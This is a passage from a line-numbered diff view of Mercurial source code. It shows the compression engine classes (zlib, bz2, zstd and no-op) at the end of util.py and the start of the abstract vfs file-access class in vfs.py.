3409 yield d.decompress(chunk, 2 ** 18)
3424 yield d.decompress(chunk, 2 ** 18)
3410 chunk = d.unconsumed_tail
3425 chunk = d.unconsumed_tail
3411
3426
3412 return chunkbuffer(gen())
3427 return chunkbuffer(gen())
3413
3428
3414 class zlibrevlogcompressor(object):
3429 class zlibrevlogcompressor(object):
3415 def compress(self, data):
3430 def compress(self, data):
3416 insize = len(data)
3431 insize = len(data)
3417 # Caller handles empty input case.
3432 # Caller handles empty input case.
3418 assert insize > 0
3433 assert insize > 0
3419
3434
3420 if insize < 44:
3435 if insize < 44:
3421 return None
3436 return None
3422
3437
3423 elif insize <= 1000000:
3438 elif insize <= 1000000:
3424 compressed = zlib.compress(data)
3439 compressed = zlib.compress(data)
3425 if len(compressed) < insize:
3440 if len(compressed) < insize:
3426 return compressed
3441 return compressed
3427 return None
3442 return None
3428
3443
3429 # zlib makes an internal copy of the input buffer, doubling
3444 # zlib makes an internal copy of the input buffer, doubling
3430 # memory usage for large inputs. So do streaming compression
3445 # memory usage for large inputs. So do streaming compression
3431 # on large inputs.
3446 # on large inputs.
3432 else:
3447 else:
3433 z = zlib.compressobj()
3448 z = zlib.compressobj()
3434 parts = []
3449 parts = []
3435 pos = 0
3450 pos = 0
3436 while pos < insize:
3451 while pos < insize:
3437 pos2 = pos + 2**20
3452 pos2 = pos + 2**20
3438 parts.append(z.compress(data[pos:pos2]))
3453 parts.append(z.compress(data[pos:pos2]))
3439 pos = pos2
3454 pos = pos2
3440 parts.append(z.flush())
3455 parts.append(z.flush())
3441
3456
3442 if sum(map(len, parts)) < insize:
3457 if sum(map(len, parts)) < insize:
3443 return ''.join(parts)
3458 return ''.join(parts)
3444 return None
3459 return None
3445
3460
3446 def decompress(self, data):
3461 def decompress(self, data):
3447 try:
3462 try:
3448 return zlib.decompress(data)
3463 return zlib.decompress(data)
3449 except zlib.error as e:
3464 except zlib.error as e:
3450 raise error.RevlogError(_('revlog decompress error: %s') %
3465 raise error.RevlogError(_('revlog decompress error: %s') %
3451 str(e))
3466 str(e))
3452
3467
3453 def revlogcompressor(self, opts=None):
3468 def revlogcompressor(self, opts=None):
3454 return self.zlibrevlogcompressor()
3469 return self.zlibrevlogcompressor()
3455
3470
3456 compengines.register(_zlibengine())
3471 compengines.register(_zlibengine())
3457
3472
3458 class _bz2engine(compressionengine):
3473 class _bz2engine(compressionengine):
3459 def name(self):
3474 def name(self):
3460 return 'bz2'
3475 return 'bz2'
3461
3476
3462 def bundletype(self):
3477 def bundletype(self):
3463 """An algorithm that produces smaller bundles than ``gzip``.
3478 """An algorithm that produces smaller bundles than ``gzip``.
3464
3479
3465 All Mercurial clients should support this format.
3480 All Mercurial clients should support this format.
3466
3481
3467 This engine will likely produce smaller bundles than ``gzip`` but
3482 This engine will likely produce smaller bundles than ``gzip`` but
3468 will be significantly slower, both during compression and
3483 will be significantly slower, both during compression and
3469 decompression.
3484 decompression.
3470
3485
3471 If available, the ``zstd`` engine can yield similar or better
3486 If available, the ``zstd`` engine can yield similar or better
3472 compression at much higher speeds.
3487 compression at much higher speeds.
3473 """
3488 """
3474 return 'bzip2', 'BZ'
3489 return 'bzip2', 'BZ'
3475
3490
3476 # We declare a protocol name but don't advertise by default because
3491 # We declare a protocol name but don't advertise by default because
3477 # it is slow.
3492 # it is slow.
3478 def wireprotosupport(self):
3493 def wireprotosupport(self):
3479 return compewireprotosupport('bzip2', 0, 0)
3494 return compewireprotosupport('bzip2', 0, 0)
3480
3495
3481 def compressstream(self, it, opts=None):
3496 def compressstream(self, it, opts=None):
3482 opts = opts or {}
3497 opts = opts or {}
3483 z = bz2.BZ2Compressor(opts.get('level', 9))
3498 z = bz2.BZ2Compressor(opts.get('level', 9))
3484 for chunk in it:
3499 for chunk in it:
3485 data = z.compress(chunk)
3500 data = z.compress(chunk)
3486 if data:
3501 if data:
3487 yield data
3502 yield data
3488
3503
3489 yield z.flush()
3504 yield z.flush()
3490
3505
3491 def decompressorreader(self, fh):
3506 def decompressorreader(self, fh):
3492 def gen():
3507 def gen():
3493 d = bz2.BZ2Decompressor()
3508 d = bz2.BZ2Decompressor()
3494 for chunk in filechunkiter(fh):
3509 for chunk in filechunkiter(fh):
3495 yield d.decompress(chunk)
3510 yield d.decompress(chunk)
3496
3511
3497 return chunkbuffer(gen())
3512 return chunkbuffer(gen())
3498
3513
3499 compengines.register(_bz2engine())
3514 compengines.register(_bz2engine())
3500
3515
3501 class _truncatedbz2engine(compressionengine):
3516 class _truncatedbz2engine(compressionengine):
3502 def name(self):
3517 def name(self):
3503 return 'bz2truncated'
3518 return 'bz2truncated'
3504
3519
3505 def bundletype(self):
3520 def bundletype(self):
3506 return None, '_truncatedBZ'
3521 return None, '_truncatedBZ'
3507
3522
3508 # We don't implement compressstream because it is hackily handled elsewhere.
3523 # We don't implement compressstream because it is hackily handled elsewhere.
3509
3524
3510 def decompressorreader(self, fh):
3525 def decompressorreader(self, fh):
3511 def gen():
3526 def gen():
3512 # The input stream doesn't have the 'BZ' header. So add it back.
3527 # The input stream doesn't have the 'BZ' header. So add it back.
3513 d = bz2.BZ2Decompressor()
3528 d = bz2.BZ2Decompressor()
3514 d.decompress('BZ')
3529 d.decompress('BZ')
3515 for chunk in filechunkiter(fh):
3530 for chunk in filechunkiter(fh):
3516 yield d.decompress(chunk)
3531 yield d.decompress(chunk)
3517
3532
3518 return chunkbuffer(gen())
3533 return chunkbuffer(gen())
3519
3534
3520 compengines.register(_truncatedbz2engine())
3535 compengines.register(_truncatedbz2engine())
3521
3536
3522 class _noopengine(compressionengine):
3537 class _noopengine(compressionengine):
3523 def name(self):
3538 def name(self):
3524 return 'none'
3539 return 'none'
3525
3540
3526 def bundletype(self):
3541 def bundletype(self):
3527 """No compression is performed.
3542 """No compression is performed.
3528
3543
3529 Use this compression engine to explicitly disable compression.
3544 Use this compression engine to explicitly disable compression.
3530 """
3545 """
3531 return 'none', 'UN'
3546 return 'none', 'UN'
3532
3547
3533 # Clients always support uncompressed payloads. Servers don't because
3548 # Clients always support uncompressed payloads. Servers don't because
3534 # unless you are on a fast network, uncompressed payloads can easily
3549 # unless you are on a fast network, uncompressed payloads can easily
3535 # saturate your network pipe.
3550 # saturate your network pipe.
3536 def wireprotosupport(self):
3551 def wireprotosupport(self):
3537 return compewireprotosupport('none', 0, 10)
3552 return compewireprotosupport('none', 0, 10)
3538
3553
3539 # We don't implement revlogheader because it is handled specially
3554 # We don't implement revlogheader because it is handled specially
3540 # in the revlog class.
3555 # in the revlog class.
3541
3556
3542 def compressstream(self, it, opts=None):
3557 def compressstream(self, it, opts=None):
3543 return it
3558 return it
3544
3559
3545 def decompressorreader(self, fh):
3560 def decompressorreader(self, fh):
3546 return fh
3561 return fh
3547
3562
3548 class nooprevlogcompressor(object):
3563 class nooprevlogcompressor(object):
3549 def compress(self, data):
3564 def compress(self, data):
3550 return None
3565 return None
3551
3566
3552 def revlogcompressor(self, opts=None):
3567 def revlogcompressor(self, opts=None):
3553 return self.nooprevlogcompressor()
3568 return self.nooprevlogcompressor()
3554
3569
3555 compengines.register(_noopengine())
3570 compengines.register(_noopengine())
3556
3571
3557 class _zstdengine(compressionengine):
3572 class _zstdengine(compressionengine):
3558 def name(self):
3573 def name(self):
3559 return 'zstd'
3574 return 'zstd'
3560
3575
3561 @propertycache
3576 @propertycache
3562 def _module(self):
3577 def _module(self):
3563 # Not all installs have the zstd module available. So defer importing
3578 # Not all installs have the zstd module available. So defer importing
3564 # until first access.
3579 # until first access.
3565 try:
3580 try:
3566 from . import zstd
3581 from . import zstd
3567 # Force delayed import.
3582 # Force delayed import.
3568 zstd.__version__
3583 zstd.__version__
3569 return zstd
3584 return zstd
3570 except ImportError:
3585 except ImportError:
3571 return None
3586 return None
3572
3587
3573 def available(self):
3588 def available(self):
3574 return bool(self._module)
3589 return bool(self._module)
3575
3590
3576 def bundletype(self):
3591 def bundletype(self):
3577 """A modern compression algorithm that is fast and highly flexible.
3592 """A modern compression algorithm that is fast and highly flexible.
3578
3593
3579 Only supported by Mercurial 4.1 and newer clients.
3594 Only supported by Mercurial 4.1 and newer clients.
3580
3595
3581 With the default settings, zstd compression is both faster and yields
3596 With the default settings, zstd compression is both faster and yields
3582 better compression than ``gzip``. It also frequently yields better
3597 better compression than ``gzip``. It also frequently yields better
3583 compression than ``bzip2`` while operating at much higher speeds.
3598 compression than ``bzip2`` while operating at much higher speeds.
3584
3599
3585 If this engine is available and backwards compatibility is not a
3600 If this engine is available and backwards compatibility is not a
3586 concern, it is likely the best available engine.
3601 concern, it is likely the best available engine.
3587 """
3602 """
3588 return 'zstd', 'ZS'
3603 return 'zstd', 'ZS'
3589
3604
3590 def wireprotosupport(self):
3605 def wireprotosupport(self):
3591 return compewireprotosupport('zstd', 50, 50)
3606 return compewireprotosupport('zstd', 50, 50)
3592
3607
3593 def revlogheader(self):
3608 def revlogheader(self):
3594 return '\x28'
3609 return '\x28'
3595
3610
3596 def compressstream(self, it, opts=None):
3611 def compressstream(self, it, opts=None):
3597 opts = opts or {}
3612 opts = opts or {}
3598 # zstd level 3 is almost always significantly faster than zlib
3613 # zstd level 3 is almost always significantly faster than zlib
3599 # while providing no worse compression. It strikes a good balance
3614 # while providing no worse compression. It strikes a good balance
3600 # between speed and compression.
3615 # between speed and compression.
3601 level = opts.get('level', 3)
3616 level = opts.get('level', 3)
3602
3617
3603 zstd = self._module
3618 zstd = self._module
3604 z = zstd.ZstdCompressor(level=level).compressobj()
3619 z = zstd.ZstdCompressor(level=level).compressobj()
3605 for chunk in it:
3620 for chunk in it:
3606 data = z.compress(chunk)
3621 data = z.compress(chunk)
3607 if data:
3622 if data:
3608 yield data
3623 yield data
3609
3624
3610 yield z.flush()
3625 yield z.flush()
3611
3626
3612 def decompressorreader(self, fh):
3627 def decompressorreader(self, fh):
3613 zstd = self._module
3628 zstd = self._module
3614 dctx = zstd.ZstdDecompressor()
3629 dctx = zstd.ZstdDecompressor()
3615 return chunkbuffer(dctx.read_from(fh))
3630 return chunkbuffer(dctx.read_from(fh))
3616
3631
3617 class zstdrevlogcompressor(object):
3632 class zstdrevlogcompressor(object):
3618 def __init__(self, zstd, level=3):
3633 def __init__(self, zstd, level=3):
3619 # Writing the content size adds a few bytes to the output. However,
3634 # Writing the content size adds a few bytes to the output. However,
3620 # it allows decompression to be more optimal since we can
3635 # it allows decompression to be more optimal since we can
3621 # pre-allocate a buffer to hold the result.
3636 # pre-allocate a buffer to hold the result.
3622 self._cctx = zstd.ZstdCompressor(level=level,
3637 self._cctx = zstd.ZstdCompressor(level=level,
3623 write_content_size=True)
3638 write_content_size=True)
3624 self._dctx = zstd.ZstdDecompressor()
3639 self._dctx = zstd.ZstdDecompressor()
3625 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3640 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3626 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3641 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3627
3642
3628 def compress(self, data):
3643 def compress(self, data):
3629 insize = len(data)
3644 insize = len(data)
3630 # Caller handles empty input case.
3645 # Caller handles empty input case.
3631 assert insize > 0
3646 assert insize > 0
3632
3647
3633 if insize < 50:
3648 if insize < 50:
3634 return None
3649 return None
3635
3650
3636 elif insize <= 1000000:
3651 elif insize <= 1000000:
3637 compressed = self._cctx.compress(data)
3652 compressed = self._cctx.compress(data)
3638 if len(compressed) < insize:
3653 if len(compressed) < insize:
3639 return compressed
3654 return compressed
3640 return None
3655 return None
3641 else:
3656 else:
3642 z = self._cctx.compressobj()
3657 z = self._cctx.compressobj()
3643 chunks = []
3658 chunks = []
3644 pos = 0
3659 pos = 0
3645 while pos < insize:
3660 while pos < insize:
3646 pos2 = pos + self._compinsize
3661 pos2 = pos + self._compinsize
3647 chunk = z.compress(data[pos:pos2])
3662 chunk = z.compress(data[pos:pos2])
3648 if chunk:
3663 if chunk:
3649 chunks.append(chunk)
3664 chunks.append(chunk)
3650 pos = pos2
3665 pos = pos2
3651 chunks.append(z.flush())
3666 chunks.append(z.flush())
3652
3667
3653 if sum(map(len, chunks)) < insize:
3668 if sum(map(len, chunks)) < insize:
3654 return ''.join(chunks)
3669 return ''.join(chunks)
3655 return None
3670 return None
3656
3671
3657 def decompress(self, data):
3672 def decompress(self, data):
3658 insize = len(data)
3673 insize = len(data)
3659
3674
3660 try:
3675 try:
3661 # This was measured to be faster than other streaming
3676 # This was measured to be faster than other streaming
3662 # decompressors.
3677 # decompressors.
3663 dobj = self._dctx.decompressobj()
3678 dobj = self._dctx.decompressobj()
3664 chunks = []
3679 chunks = []
3665 pos = 0
3680 pos = 0
3666 while pos < insize:
3681 while pos < insize:
3667 pos2 = pos + self._decompinsize
3682 pos2 = pos + self._decompinsize
3668 chunk = dobj.decompress(data[pos:pos2])
3683 chunk = dobj.decompress(data[pos:pos2])
3669 if chunk:
3684 if chunk:
3670 chunks.append(chunk)
3685 chunks.append(chunk)
3671 pos = pos2
3686 pos = pos2
3672 # Frame should be exhausted, so no finish() API.
3687 # Frame should be exhausted, so no finish() API.
3673
3688
3674 return ''.join(chunks)
3689 return ''.join(chunks)
3675 except Exception as e:
3690 except Exception as e:
3676 raise error.RevlogError(_('revlog decompress error: %s') %
3691 raise error.RevlogError(_('revlog decompress error: %s') %
3677 str(e))
3692 str(e))
3678
3693
3679 def revlogcompressor(self, opts=None):
3694 def revlogcompressor(self, opts=None):
3680 opts = opts or {}
3695 opts = opts or {}
3681 return self.zstdrevlogcompressor(self._module,
3696 return self.zstdrevlogcompressor(self._module,
3682 level=opts.get('level', 3))
3697 level=opts.get('level', 3))
3683
3698
3684 compengines.register(_zstdengine())
3699 compengines.register(_zstdengine())
3685
3700
3686 def bundlecompressiontopics():
3701 def bundlecompressiontopics():
3687 """Obtains a list of available bundle compressions for use in help."""
3702 """Obtains a list of available bundle compressions for use in help."""
3688 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3703 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3689 items = {}
3704 items = {}
3690
3705
3691 # We need to format the docstring. So use a dummy object/type to hold it
3706 # We need to format the docstring. So use a dummy object/type to hold it
3692 # rather than mutating the original.
3707 # rather than mutating the original.
3693 class docobject(object):
3708 class docobject(object):
3694 pass
3709 pass
3695
3710
3696 for name in compengines:
3711 for name in compengines:
3697 engine = compengines[name]
3712 engine = compengines[name]
3698
3713
3699 if not engine.available():
3714 if not engine.available():
3700 continue
3715 continue
3701
3716
3702 bt = engine.bundletype()
3717 bt = engine.bundletype()
3703 if not bt or not bt[0]:
3718 if not bt or not bt[0]:
3704 continue
3719 continue
3705
3720
3706 doc = pycompat.sysstr('``%s``\n %s') % (
3721 doc = pycompat.sysstr('``%s``\n %s') % (
3707 bt[0], engine.bundletype.__doc__)
3722 bt[0], engine.bundletype.__doc__)
3708
3723
3709 value = docobject()
3724 value = docobject()
3710 value.__doc__ = doc
3725 value.__doc__ = doc
3711
3726
3712 items[bt[0]] = value
3727 items[bt[0]] = value
3713
3728
3714 return items
3729 return items
3715
3730
3716 # convenient shortcut
3731 # convenient shortcut
3717 dst = debugstacktrace
3732 dst = debugstacktrace
@@ -1,642 +1,647 b''
1 # vfs.py - Mercurial 'vfs' classes
1 # vfs.py - Mercurial 'vfs' classes
2 #
2 #
3 # Copyright Matt Mackall <mpm@selenic.com>
3 # Copyright Matt Mackall <mpm@selenic.com>
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7 from __future__ import absolute_import
7 from __future__ import absolute_import
8
8
9 import contextlib
9 import contextlib
10 import errno
10 import errno
11 import os
11 import os
12 import shutil
12 import shutil
13 import stat
13 import stat
14 import tempfile
14 import tempfile
15 import threading
15 import threading
16
16
17 from .i18n import _
17 from .i18n import _
18 from . import (
18 from . import (
19 error,
19 error,
20 pathutil,
20 pathutil,
21 pycompat,
21 pycompat,
22 util,
22 util,
23 )
23 )
24
24
25 def _avoidambig(path, oldstat):
25 def _avoidambig(path, oldstat):
26 """Avoid file stat ambiguity forcibly
26 """Avoid file stat ambiguity forcibly
27
27
28 This function causes copying ``path`` file, if it is owned by
28 This function causes copying ``path`` file, if it is owned by
29 another (see issue5418 and issue5584 for detail).
29 another (see issue5418 and issue5584 for detail).
30 """
30 """
31 def checkandavoid():
31 def checkandavoid():
32 newstat = util.filestat.frompath(path)
32 newstat = util.filestat.frompath(path)
33 # return whether file stat ambiguity is (already) avoided
33 # return whether file stat ambiguity is (already) avoided
34 return (not newstat.isambig(oldstat) or
34 return (not newstat.isambig(oldstat) or
35 newstat.avoidambig(path, oldstat))
35 newstat.avoidambig(path, oldstat))
36 if not checkandavoid():
36 if not checkandavoid():
37 # simply copy to change owner of path to get privilege to
37 # simply copy to change owner of path to get privilege to
38 # advance mtime (see issue5418)
38 # advance mtime (see issue5418)
39 util.rename(util.mktempcopy(path), path)
39 util.rename(util.mktempcopy(path), path)
40 checkandavoid()
40 checkandavoid()
41
41
42 class abstractvfs(object):
42 class abstractvfs(object):
43 """Abstract base class; cannot be instantiated"""
43 """Abstract base class; cannot be instantiated"""
44
44
45 def __init__(self, *args, **kwargs):
45 def __init__(self, *args, **kwargs):
46 '''Prevent instantiation; don't call this from subclasses.'''
46 '''Prevent instantiation; don't call this from subclasses.'''
47 raise NotImplementedError('attempted instantiating ' + str(type(self)))
47 raise NotImplementedError('attempted instantiating ' + str(type(self)))
48
48
49 def tryread(self, path):
49 def tryread(self, path):
50 '''gracefully return an empty string for missing files'''
50 '''gracefully return an empty string for missing files'''
51 try:
51 try:
52 return self.read(path)
52 return self.read(path)
53 except IOError as inst:
53 except IOError as inst:
54 if inst.errno != errno.ENOENT:
54 if inst.errno != errno.ENOENT:
55 raise
55 raise
56 return ""
56 return ""
57
57
58 def tryreadlines(self, path, mode='rb'):
58 def tryreadlines(self, path, mode='rb'):
59 '''gracefully return an empty array for missing files'''
59 '''gracefully return an empty array for missing files'''
60 try:
60 try:
61 return self.readlines(path, mode=mode)
61 return self.readlines(path, mode=mode)
62 except IOError as inst:
62 except IOError as inst:
63 if inst.errno != errno.ENOENT:
63 if inst.errno != errno.ENOENT:
64 raise
64 raise
65 return []
65 return []
66
66
67 @util.propertycache
67 @util.propertycache
68 def open(self):
68 def open(self):
69 '''Open ``path`` file, which is relative to vfs root.
69 '''Open ``path`` file, which is relative to vfs root.
70
70
71 Newly created directories are marked as "not to be indexed by
71 Newly created directories are marked as "not to be indexed by
72 the content indexing service", if ``notindexed`` is specified
72 the content indexing service", if ``notindexed`` is specified
73 for "write" mode access.
73 for "write" mode access.
74 '''
74 '''
75 return self.__call__
75 return self.__call__
76
76
77 def read(self, path):
77 def read(self, path):
78 with self(path, 'rb') as fp:
78 with self(path, 'rb') as fp:
79 return fp.read()
79 return fp.read()
80
80
81 def readlines(self, path, mode='rb'):
81 def readlines(self, path, mode='rb'):
82 with self(path, mode=mode) as fp:
82 with self(path, mode=mode) as fp:
83 return fp.readlines()
83 return fp.readlines()
84
84
85 def write(self, path, data, backgroundclose=False):
85 def write(self, path, data, backgroundclose=False):
86 with self(path, 'wb', backgroundclose=backgroundclose) as fp:
86 with self(path, 'wb', backgroundclose=backgroundclose) as fp:
87 return fp.write(data)
87 return fp.write(data)
88
88
89 def writelines(self, path, data, mode='wb', notindexed=False):
89 def writelines(self, path, data, mode='wb', notindexed=False):
90 with self(path, mode=mode, notindexed=notindexed) as fp:
90 with self(path, mode=mode, notindexed=notindexed) as fp:
91 return fp.writelines(data)
91 return fp.writelines(data)
92
92
93 def append(self, path, data):
93 def append(self, path, data):
94 with self(path, 'ab') as fp:
94 with self(path, 'ab') as fp:
95 return fp.write(data)
95 return fp.write(data)
96
96
97 def basename(self, path):
97 def basename(self, path):
98 """return base element of a path (as os.path.basename would do)
98 """return base element of a path (as os.path.basename would do)
99
99
100 This exists to allow handling of strange encoding if needed."""
100 This exists to allow handling of strange encoding if needed."""
101 return os.path.basename(path)
101 return os.path.basename(path)
102
102
103 def chmod(self, path, mode):
103 def chmod(self, path, mode):
104 return os.chmod(self.join(path), mode)
104 return os.chmod(self.join(path), mode)
105
105
106 def dirname(self, path):
106 def dirname(self, path):
107 """return dirname element of a path (as os.path.dirname would do)
107 """return dirname element of a path (as os.path.dirname would do)
108
108
109 This exists to allow handling of strange encoding if needed."""
109 This exists to allow handling of strange encoding if needed."""
110 return os.path.dirname(path)
110 return os.path.dirname(path)
111
111
112 def exists(self, path=None):
112 def exists(self, path=None):
113 return os.path.exists(self.join(path))
113 return os.path.exists(self.join(path))
114
114
115 def fstat(self, fp):
115 def fstat(self, fp):
116 return util.fstat(fp)
116 return util.fstat(fp)
117
117
118 def isdir(self, path=None):
118 def isdir(self, path=None):
119 return os.path.isdir(self.join(path))
119 return os.path.isdir(self.join(path))
120
120
121 def isfile(self, path=None):
121 def isfile(self, path=None):
122 return os.path.isfile(self.join(path))
122 return os.path.isfile(self.join(path))
123
123
124 def islink(self, path=None):
124 def islink(self, path=None):
125 return os.path.islink(self.join(path))
125 return os.path.islink(self.join(path))
126
126
127 def isfileorlink(self, path=None):
127 def isfileorlink(self, path=None):
128 '''return whether path is a regular file or a symlink
128 '''return whether path is a regular file or a symlink
129
129
130 Unlike isfile, this doesn't follow symlinks.'''
130 Unlike isfile, this doesn't follow symlinks.'''
131 try:
131 try:
132 st = self.lstat(path)
132 st = self.lstat(path)
133 except OSError:
133 except OSError:
134 return False
134 return False
135 mode = st.st_mode
135 mode = st.st_mode
136 return stat.S_ISREG(mode) or stat.S_ISLNK(mode)
136 return stat.S_ISREG(mode) or stat.S_ISLNK(mode)
137
137
138 def reljoin(self, *paths):
138 def reljoin(self, *paths):
139 """join various elements of a path together (as os.path.join would do)
139 """join various elements of a path together (as os.path.join would do)
140
140
141 The vfs base is not injected so that path stay relative. This exists
141 The vfs base is not injected so that path stay relative. This exists
142 to allow handling of strange encoding if needed."""
142 to allow handling of strange encoding if needed."""
143 return os.path.join(*paths)
143 return os.path.join(*paths)
144
144
145 def split(self, path):
145 def split(self, path):
146 """split top-most element of a path (as os.path.split would do)
146 """split top-most element of a path (as os.path.split would do)
147
147
148 This exists to allow handling of strange encoding if needed."""
148 This exists to allow handling of strange encoding if needed."""
149 return os.path.split(path)
149 return os.path.split(path)
150
150
151 def lexists(self, path=None):
151 def lexists(self, path=None):
152 return os.path.lexists(self.join(path))
152 return os.path.lexists(self.join(path))
153
153
154 def lstat(self, path=None):
154 def lstat(self, path=None):
155 return os.lstat(self.join(path))
155 return os.lstat(self.join(path))
156
156
157 def listdir(self, path=None):
157 def listdir(self, path=None):
158 return os.listdir(self.join(path))
158 return os.listdir(self.join(path))
159
159
160 def makedir(self, path=None, notindexed=True):
160 def makedir(self, path=None, notindexed=True):
161 return util.makedir(self.join(path), notindexed)
161 return util.makedir(self.join(path), notindexed)
162
162
163 def makedirs(self, path=None, mode=None):
163 def makedirs(self, path=None, mode=None):
164 return util.makedirs(self.join(path), mode)
164 return util.makedirs(self.join(path), mode)
165
165
166 def makelock(self, info, path):
166 def makelock(self, info, path):
167 return util.makelock(info, self.join(path))
167 return util.makelock(info, self.join(path))
168
168
169 def mkdir(self, path=None):
169 def mkdir(self, path=None):
170 return os.mkdir(self.join(path))
170 return os.mkdir(self.join(path))
171
171
172 def mkstemp(self, suffix='', prefix='tmp', dir=None, text=False):
172 def mkstemp(self, suffix='', prefix='tmp', dir=None, text=False):
173 fd, name = tempfile.mkstemp(suffix=suffix, prefix=prefix,
173 fd, name = tempfile.mkstemp(suffix=suffix, prefix=prefix,
174 dir=self.join(dir), text=text)
174 dir=self.join(dir), text=text)
175 dname, fname = util.split(name)
175 dname, fname = util.split(name)
176 if dir:
176 if dir:
177 return fd, os.path.join(dir, fname)
177 return fd, os.path.join(dir, fname)
178 else:
178 else:
179 return fd, fname
179 return fd, fname
180
180
181 def readdir(self, path=None, stat=None, skip=None):
181 def readdir(self, path=None, stat=None, skip=None):
182 return util.listdir(self.join(path), stat, skip)
182 return util.listdir(self.join(path), stat, skip)
183
183
184 def readlock(self, path):
184 def readlock(self, path):
185 return util.readlock(self.join(path))
185 return util.readlock(self.join(path))
186
186
187 def rename(self, src, dst, checkambig=False):
187 def rename(self, src, dst, checkambig=False):
188 """Rename from src to dst
188 """Rename from src to dst
189
189
190 checkambig argument is used with util.filestat, and is useful
190 checkambig argument is used with util.filestat, and is useful
191 only if destination file is guarded by any lock
191 only if destination file is guarded by any lock
192 (e.g. repo.lock or repo.wlock).
192 (e.g. repo.lock or repo.wlock).
193
193
194 To avoid file stat ambiguity forcibly, checkambig=True involves
194 To avoid file stat ambiguity forcibly, checkambig=True involves
195 copying ``src`` file, if it is owned by another. Therefore, use
195 copying ``src`` file, if it is owned by another. Therefore, use
196 checkambig=True only in limited cases (see also issue5418 and
196 checkambig=True only in limited cases (see also issue5418 and
197 issue5584 for detail).
197 issue5584 for detail).
198 """
198 """
199 srcpath = self.join(src)
199 srcpath = self.join(src)
200 dstpath = self.join(dst)
200 dstpath = self.join(dst)
201 oldstat = checkambig and util.filestat.frompath(dstpath)
201 oldstat = checkambig and util.filestat.frompath(dstpath)
202 if oldstat and oldstat.stat:
202 if oldstat and oldstat.stat:
203 ret = util.rename(srcpath, dstpath)
203 ret = util.rename(srcpath, dstpath)
204 _avoidambig(dstpath, oldstat)
204 _avoidambig(dstpath, oldstat)
205 return ret
205 return ret
206 return util.rename(srcpath, dstpath)
206 return util.rename(srcpath, dstpath)
207
207
208 def readlink(self, path):
208 def readlink(self, path):
209 return os.readlink(self.join(path))
209 return os.readlink(self.join(path))
210
210
211 def removedirs(self, path=None):
211 def removedirs(self, path=None):
212 """Remove a leaf directory and all empty intermediate ones
212 """Remove a leaf directory and all empty intermediate ones
213 """
213 """
214 return util.removedirs(self.join(path))
214 return util.removedirs(self.join(path))
215
215
216 def rmtree(self, path=None, ignore_errors=False, forcibly=False):
216 def rmtree(self, path=None, ignore_errors=False, forcibly=False):
217 """Remove a directory tree recursively
217 """Remove a directory tree recursively
218
218
219 If ``forcibly``, this tries to remove READ-ONLY files, too.
219 If ``forcibly``, this tries to remove READ-ONLY files, too.
220 """
220 """
221 if forcibly:
221 if forcibly:
222 def onerror(function, path, excinfo):
222 def onerror(function, path, excinfo):
223 if function is not os.remove:
223 if function is not os.remove:
224 raise
224 raise
225 # read-only files cannot be unlinked under Windows
225 # read-only files cannot be unlinked under Windows
226 s = os.stat(path)
226 s = os.stat(path)
227 if (s.st_mode & stat.S_IWRITE) != 0:
227 if (s.st_mode & stat.S_IWRITE) != 0:
228 raise
228 raise
229 os.chmod(path, stat.S_IMODE(s.st_mode) | stat.S_IWRITE)
229 os.chmod(path, stat.S_IMODE(s.st_mode) | stat.S_IWRITE)
230 os.remove(path)
230 os.remove(path)
231 else:
231 else:
232 onerror = None
232 onerror = None
233 return shutil.rmtree(self.join(path),
233 return shutil.rmtree(self.join(path),
234 ignore_errors=ignore_errors, onerror=onerror)
234 ignore_errors=ignore_errors, onerror=onerror)
235
235
236 def setflags(self, path, l, x):
236 def setflags(self, path, l, x):
237 return util.setflags(self.join(path), l, x)
237 return util.setflags(self.join(path), l, x)
238
238
239 def stat(self, path=None):
239 def stat(self, path=None):
240 return os.stat(self.join(path))
240 return os.stat(self.join(path))
241
241
242 def unlink(self, path=None):
242 def unlink(self, path=None):
243 return util.unlink(self.join(path))
243 return util.unlink(self.join(path))
244
244
245 def tryunlink(self, path=None):
245 def tryunlink(self, path=None):
246 """Attempt to remove a file, ignoring missing file errors."""
246 """Attempt to remove a file, ignoring missing file errors."""
247 util.tryunlink(self.join(path))
247 util.tryunlink(self.join(path))
248
248
249 def unlinkpath(self, path=None, ignoremissing=False):
249 def unlinkpath(self, path=None, ignoremissing=False):
250 return util.unlinkpath(self.join(path), ignoremissing=ignoremissing)
250 return util.unlinkpath(self.join(path), ignoremissing=ignoremissing)
251
251
252 def utime(self, path=None, t=None):
252 def utime(self, path=None, t=None):
253 return os.utime(self.join(path), t)
253 return os.utime(self.join(path), t)
254
254
255 def walk(self, path=None, onerror=None):
255 def walk(self, path=None, onerror=None):
256 """Yield (dirpath, dirs, files) tuple for each directories under path
256 """Yield (dirpath, dirs, files) tuple for each directories under path
257
257
258 ``dirpath`` is relative one from the root of this vfs. This
258 ``dirpath`` is relative one from the root of this vfs. This
259 uses ``os.sep`` as path separator, even you specify POSIX
259 uses ``os.sep`` as path separator, even you specify POSIX
260 style ``path``.
260 style ``path``.
261
261
262 "The root of this vfs" is represented as empty ``dirpath``.
262 "The root of this vfs" is represented as empty ``dirpath``.
263 """
263 """
264 root = os.path.normpath(self.join(None))
264 root = os.path.normpath(self.join(None))
265 # when dirpath == root, dirpath[prefixlen:] becomes empty
265 # when dirpath == root, dirpath[prefixlen:] becomes empty
266 # because len(dirpath) < prefixlen.
266 # because len(dirpath) < prefixlen.
267 prefixlen = len(pathutil.normasprefix(root))
267 prefixlen = len(pathutil.normasprefix(root))
268 for dirpath, dirs, files in os.walk(self.join(path), onerror=onerror):
268 for dirpath, dirs, files in os.walk(self.join(path), onerror=onerror):
269 yield (dirpath[prefixlen:], dirs, files)
269 yield (dirpath[prefixlen:], dirs, files)
270
270
271 @contextlib.contextmanager
271 @contextlib.contextmanager
272 def backgroundclosing(self, ui, expectedcount=-1):
272 def backgroundclosing(self, ui, expectedcount=-1):
273 """Allow files to be closed asynchronously.
273 """Allow files to be closed asynchronously.
274
274
275 When this context manager is active, ``backgroundclose`` can be passed
275 When this context manager is active, ``backgroundclose`` can be passed
